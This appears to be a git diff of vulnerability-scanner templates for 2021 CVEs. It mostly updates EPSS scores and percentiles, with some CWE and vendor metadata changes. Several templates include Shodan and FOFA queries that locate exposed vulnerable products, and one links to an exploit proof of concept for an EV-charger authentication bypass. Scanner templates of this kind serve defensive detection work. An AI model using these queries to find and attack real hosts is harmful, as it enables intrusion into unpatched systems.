+++ b/http/cves/2021/CVE-2021-21315.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
- epss-score: 0.97232
+ epss-score: 0.97213
cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.99738
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml
index 9f8abdcc81..6028c03e9b 100644
--- a/http/cves/2021/CVE-2021-21345.yaml
+++ b/http/cves/2021/CVE-2021-21345.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.9
cve-id: CVE-2021-21345
cwe-id: CWE-78,CWE-502
- epss-score: 0.48389
+ epss-score: 0.35598
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96598
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml
index 37afc2f3de..b7dff9e07f 100644
--- a/http/cves/2021/CVE-2021-21351.yaml
+++ b/http/cves/2021/CVE-2021-21351.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2021-21351
cwe-id: CWE-434
- epss-score: 0.9556
+ epss-score: 0.9411
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9883
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml
index 0973520b1c..c3474c74ac 100644
--- a/http/cves/2021/CVE-2021-21389.yaml
+++ b/http/cves/2021/CVE-2021-21389.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-863
epss-score: 0.77888
cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97815
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml
index 083e31476d..79f7fa8e6a 100644
--- a/http/cves/2021/CVE-2021-21402.yaml
+++ b/http/cves/2021/CVE-2021-21402.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-21402
cwe-id: CWE-22
- epss-score: 0.25761
+ epss-score: 0.23511
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95936
metadata:
max-request: 2
fofa-query: title="Jellyfin" || body="http://jellyfin.media"
diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml
index cbd0628ce8..0c87580294 100644
--- a/http/cves/2021/CVE-2021-21479.yaml
+++ b/http/cves/2021/CVE-2021-21479.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2021-21479
cwe-id: CWE-74
- epss-score: 0.00323
+ epss-score: 0.00281
cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:*
+ epss-percentile: 0.64444
metadata:
max-request: 1
vendor: sap
diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml
index 3319872782..4c83540473 100644
--- a/http/cves/2021/CVE-2021-21745.yaml
+++ b/http/cves/2021/CVE-2021-21745.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2021-21745
cwe-id: CWE-352
- epss-score: 0.44955
+ epss-score: 0.23979
cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:*
+ epss-percentile: 0.95971
metadata:
max-request: 1
vendor: zte
diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml
index d78f748fde..b8c5f0acca 100644
--- a/http/cves/2021/CVE-2021-21799.yaml
+++ b/http/cves/2021/CVE-2021-21799.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.85976
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.98127
metadata:
max-request: 1
shodan-query: http.html:"R-SeeNet"
diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml
index 730568a230..229dddf4f4 100644
--- a/http/cves/2021/CVE-2021-21800.yaml
+++ b/http/cves/2021/CVE-2021-21800.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.85976
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.98127
metadata:
max-request: 1
shodan-query: http.html:"R-SeeNet"
diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml
index 580549c638..0cce3ed62a 100644
--- a/http/cves/2021/CVE-2021-21801.yaml
+++ b/http/cves/2021/CVE-2021-21801.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.85976
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.98127
metadata:
max-request: 1
vendor: advantech
diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml
index a54dfb7c55..c7baa7093b 100644
--- a/http/cves/2021/CVE-2021-21802.yaml
+++ b/http/cves/2021/CVE-2021-21802.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.85976
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.98127
metadata:
max-request: 1
vendor: advantech
diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml
index e1244f84a4..40518e646f 100644
--- a/http/cves/2021/CVE-2021-21803.yaml
+++ b/http/cves/2021/CVE-2021-21803.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.85976
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.98127
metadata:
max-request: 1
vendor: advantech
diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml
index 2be64f7b5f..740f49ddee 100644
--- a/http/cves/2021/CVE-2021-21805.yaml
+++ b/http/cves/2021/CVE-2021-21805.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97394
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
+ epss-percentile: 0.99872
metadata:
max-request: 1
shodan-query: http.html:"R-SeeNet"
diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml
index 1ce1eddd41..f01e3e4975 100644
--- a/http/cves/2021/CVE-2021-21816.yaml
+++ b/http/cves/2021/CVE-2021-21816.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2021-21816
cwe-id: CWE-200
- epss-score: 0.00337
+ epss-score: 0.00255
cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*
+ epss-percentile: 0.62674
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml
index 7244076b9d..e3f45e4d9d 100644
--- a/http/cves/2021/CVE-2021-21881.yaml
+++ b/http/cves/2021/CVE-2021-21881.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.9
cve-id: CVE-2021-21881
cwe-id: CWE-78
- epss-score: 0.97108
+ epss-score: 0.97105
cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:*
+ epss-percentile: 0.99673
metadata:
max-request: 2
vendor: lantronix
diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml
index 49c258599e..5f1c2153e3 100644
--- a/http/cves/2021/CVE-2021-21972.yaml
+++ b/http/cves/2021/CVE-2021-21972.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21972
cwe-id: CWE-22
- epss-score: 0.97386
+ epss-score: 0.97432
cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99903
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml
index 02963f5aa9..f1465778c7 100644
--- a/http/cves/2021/CVE-2021-21973.yaml
+++ b/http/cves/2021/CVE-2021-21973.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-21973
cwe-id: CWE-918
- epss-score: 0.18619
+ epss-score: 0.17148
cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95393
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml
index 3c3e010e82..53f47e5701 100644
--- a/http/cves/2021/CVE-2021-21975.yaml
+++ b/http/cves/2021/CVE-2021-21975.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-21975
cwe-id: CWE-918
- epss-score: 0.97441
+ epss-score: 0.97437
cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9991
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml
index 39fb89990e..7edb67e2ed 100644
--- a/http/cves/2021/CVE-2021-21978.yaml
+++ b/http/cves/2021/CVE-2021-21978.yaml
@@ -17,9 +17,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21978
- cwe-id: CWE-434
- epss-score: 0.9748
+ cwe-id: CWE-20
+ epss-score: 0.97519
cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99976
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml
index 13364b60e7..f751101ccb 100644
--- a/http/cves/2021/CVE-2021-21985.yaml
+++ b/http/cves/2021/CVE-2021-21985.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21985
cwe-id: CWE-20
- epss-score: 0.9746
+ epss-score: 0.97454
cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
+ epss-percentile: 0.99926
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml
index df4e79d889..42e85e49cf 100644
--- a/http/cves/2021/CVE-2021-22005.yaml
+++ b/http/cves/2021/CVE-2021-22005.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22005
- cwe-id: CWE-434
- epss-score: 0.9731
+ cwe-id: CWE-22
+ epss-score: 0.97237
cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99755
metadata:
max-request: 2
vendor: vmware
diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml
index 5d2179fd49..37b22e6061 100644
--- a/http/cves/2021/CVE-2021-22053.yaml
+++ b/http/cves/2021/CVE-2021-22053.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-22053
cwe-id: CWE-94
- cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
epss-score: 0.7163
+ cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97629
metadata:
max-request: 2
product: spring_cloud_netflix
diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml
index f9af2c9bc6..a3c97613f3 100644
--- a/http/cves/2021/CVE-2021-22054.yaml
+++ b/http/cves/2021/CVE-2021-22054.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-22054
cwe-id: CWE-918
- epss-score: 0.83683
+ epss-score: 0.76256
cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97769
metadata:
max-request: 1
fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml
index eb08132459..8a2c656674 100644
--- a/http/cves/2021/CVE-2021-22122.yaml
+++ b/http/cves/2021/CVE-2021-22122.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.11206
cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94436
metadata:
max-request: 2
vendor: fortinet
diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml
index 208cd03eb0..6891d25a16 100644
--- a/http/cves/2021/CVE-2021-22145.yaml
+++ b/http/cves/2021/CVE-2021-22145.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-22145
cwe-id: CWE-209
- epss-score: 0.34493
+ epss-score: 0.36411
cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96626
metadata:
max-request: 1
vendor: elastic
diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml
index 6d5cdaf793..a5fa65008b 100644
--- a/http/cves/2021/CVE-2021-22205.yaml
+++ b/http/cves/2021/CVE-2021-22205.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 10
cve-id: CVE-2021-22205
cwe-id: CWE-94
- epss-score: 0.97427
+ epss-score: 0.97419
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.9989
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml
index f727ef30ad..daff573204 100644
--- a/http/cves/2021/CVE-2021-22214.yaml
+++ b/http/cves/2021/CVE-2021-22214.yaml
@@ -20,8 +20,9 @@ info:
cvss-score: 8.6
cve-id: CVE-2021-22214
cwe-id: CWE-918
- epss-score: 0.17173
+ epss-score: 0.12503
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94709
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml
index 8b6a3bf0b2..b7ae2e4e9c 100644
--- a/http/cves/2021/CVE-2021-22502.yaml
+++ b/http/cves/2021/CVE-2021-22502.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-22502
cwe-id: CWE-78
- epss-score: 0.97447
+ epss-score: 0.9745
cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*
+ epss-percentile: 0.9992
metadata:
max-request: 1
vendor: microfocus
diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml
index 01aba9db23..0d13ecab7e 100644
--- a/http/cves/2021/CVE-2021-22707.yaml
+++ b/http/cves/2021/CVE-2021-22707.yaml
@@ -9,13 +9,22 @@ info:
reference:
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
+ - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2021-22707
+ cwe-id: CWE-798
+ epss-score: 0.3812
+ cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96713
metadata:
max-request: 1
verified: true
shodan-query: title:"EVSE web interface"
fofa-query: title="EVSE web interface"
+ vendor: schneider-electric
+ product: evlink_city_evc1s22p4_firmware
tags: cve,cve2021,evlink,auth-bypass
http:
@@ -29,6 +38,7 @@ http:
host-redirects: true
max-redirects: 2
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml
index 871a526f21..b54257f575 100644
--- a/http/cves/2021/CVE-2021-22873.yaml
+++ b/http/cves/2021/CVE-2021-22873.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-22873
cwe-id: CWE-601
- epss-score: 0.00717
+ epss-score: 0.00867
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80246
metadata:
max-request: 6
shodan-query: http.favicon.hash:106844876
diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml
index 406e7a8608..04bbac2cb2 100644
--- a/http/cves/2021/CVE-2021-22911.yaml
+++ b/http/cves/2021/CVE-2021-22911.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-22911
cwe-id: CWE-75,NVD-CWE-Other
- epss-score: 0.95173
+ epss-score: 0.94897
cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:*
+ epss-percentile: 0.98981
metadata:
max-request: 1
shodan-query: http.title:"Rocket.Chat"
diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml
index 97c40b1a6c..c3eff47dfa 100644
--- a/http/cves/2021/CVE-2021-22986.yaml
+++ b/http/cves/2021/CVE-2021-22986.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-918
epss-score: 0.97452
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99923
metadata:
max-request: 2
vendor: f5
diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml
index a4b37708b8..023b22cde2 100644
--- a/http/cves/2021/CVE-2021-23241.yaml
+++ b/http/cves/2021/CVE-2021-23241.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-23241
cwe-id: CWE-22
- epss-score: 0.00265
+ epss-score: 0.00321
cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.66807
metadata:
max-request: 1
vendor: mercusys
diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml
index e7d034c81f..41b3bf8fbe 100644
--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-24145
cwe-id: CWE-434
- epss-score: 0.93699
+ epss-score: 0.93112
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.98681
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml
index b975973f29..edb7a51de9 100644
--- a/http/cves/2021/CVE-2021-24146.yaml
+++ b/http/cves/2021/CVE-2021-24146.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-862,CWE-284
epss-score: 0.02392
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88487
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml
index 3b850d418d..5bb278ab05 100644
--- a/http/cves/2021/CVE-2021-24150.yaml
+++ b/http/cves/2021/CVE-2021-24150.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-24150
cwe-id: CWE-918
- epss-score: 0.02348
+ epss-score: 0.02513
cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88746
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml
index 6561b50bfb..86b3bcf025 100644
--- a/http/cves/2021/CVE-2021-24155.yaml
+++ b/http/cves/2021/CVE-2021-24155.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-24155
cwe-id: CWE-434
- epss-score: 0.95474
+ epss-score: 0.95167
cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99034
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml
index 240938494d..ad4ae02bb5 100644
--- a/http/cves/2021/CVE-2021-24165.yaml
+++ b/http/cves/2021/CVE-2021-24165.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00116
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44596
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml
index f3252ead0b..196aa642ce 100644
--- a/http/cves/2021/CVE-2021-24169.yaml
+++ b/http/cves/2021/CVE-2021-24169.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00183
cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54871
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml
index 77b4ffb0ea..9598a8510b 100644
--- a/http/cves/2021/CVE-2021-24176.yaml
+++ b/http/cves/2021/CVE-2021-24176.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00136
cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.48282
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml
index 21c3ad4076..fdadb44386 100644
--- a/http/cves/2021/CVE-2021-24210.yaml
+++ b/http/cves/2021/CVE-2021-24210.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00116
cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44596
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml
index 66635139d6..0b7d049745 100644
--- a/http/cves/2021/CVE-2021-24214.yaml
+++ b/http/cves/2021/CVE-2021-24214.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00369
cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.69091
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml
index 63b9bfb5e1..90a2856bc8 100644
--- a/http/cves/2021/CVE-2021-24226.yaml
+++ b/http/cves/2021/CVE-2021-24226.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-200
epss-score: 0.03501
cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90323
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml
index 6b82d04b4c..b5141b55f4 100644
--- a/http/cves/2021/CVE-2021-24227.yaml
+++ b/http/cves/2021/CVE-2021-24227.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-200
epss-score: 0.03493
cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90307
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml
index 0156a85cd7..a908b8bcb1 100644
--- a/http/cves/2021/CVE-2021-24235.yaml
+++ b/http/cves/2021/CVE-2021-24235.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44609
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml
index 5f13ecb224..fdd12bda7f 100644
--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: "CVE-2021-24236"
cwe-id: CWE-434
- epss-score: 0.11054
+ epss-score: 0.14539
cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95043
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml
index 1f0c27dac1..7cf3616d70 100644
--- a/http/cves/2021/CVE-2021-24237.yaml
+++ b/http/cves/2021/CVE-2021-24237.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00284
cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.64615
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml
index 671968f9f8..378b29a0f5 100644
--- a/http/cves/2021/CVE-2021-24239.yaml
+++ b/http/cves/2021/CVE-2021-24239.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44596
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml
index b3f4519f3c..c340a16307 100644
--- a/http/cves/2021/CVE-2021-24245.yaml
+++ b/http/cves/2021/CVE-2021-24245.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54153
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml
index 681392d2ba..53e3d49b93 100644
--- a/http/cves/2021/CVE-2021-24274.yaml
+++ b/http/cves/2021/CVE-2021-24274.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00147
cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50047
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml
index f7810f034d..e046003663 100644
--- a/http/cves/2021/CVE-2021-24275.yaml
+++ b/http/cves/2021/CVE-2021-24275.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54153
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml
index 0b04423d3d..6a386ff5f3 100644
--- a/http/cves/2021/CVE-2021-24276.yaml
+++ b/http/cves/2021/CVE-2021-24276.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54153
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml
index e734626adc..8ffb0fa7bb 100644
--- a/http/cves/2021/CVE-2021-24278.yaml
+++ b/http/cves/2021/CVE-2021-24278.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-863
epss-score: 0.07444
cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9325
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml
index 6c438dd4e4..03db28e502 100644
--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-24284
cwe-id: CWE-434
- epss-score: 0.96916
+ epss-score: 0.96885
cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99579
metadata:
max-request: 2
